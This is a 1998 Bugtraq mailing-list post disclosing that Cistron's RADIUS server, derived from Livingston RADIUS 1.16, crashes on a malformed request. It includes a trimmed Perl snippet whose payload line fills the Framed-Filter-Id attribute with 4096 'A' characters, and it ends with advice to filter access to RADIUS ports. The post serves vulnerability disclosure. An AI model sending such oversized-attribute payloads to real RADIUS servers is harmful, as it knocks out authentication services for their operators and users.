From hamdi.tounsi@ati.tn Sat Apr 25 01:31:18 1998
From: Hamdi Tounsi
To: BUGTRAQ@NETSPACE.ORG
Date: Tue, 21 Apr 1998 09:59:08 -0100
Subject: code to crash cistron's radius
cistron's radius is also vulnerable to the radius crasher i posted here last
week, since it is derived from livingston's radius 1.16. the code is simpler :
#!/usr/bin/perl
[snip...]
{Name => 'User-Name', Value => 'dummy'},
{Name => 'Framed-Filter-Id',Type =>'string',Value =>pack('A4096','A')},
[snip...]
* remember to filter access to your radius servers ports to protect them.
|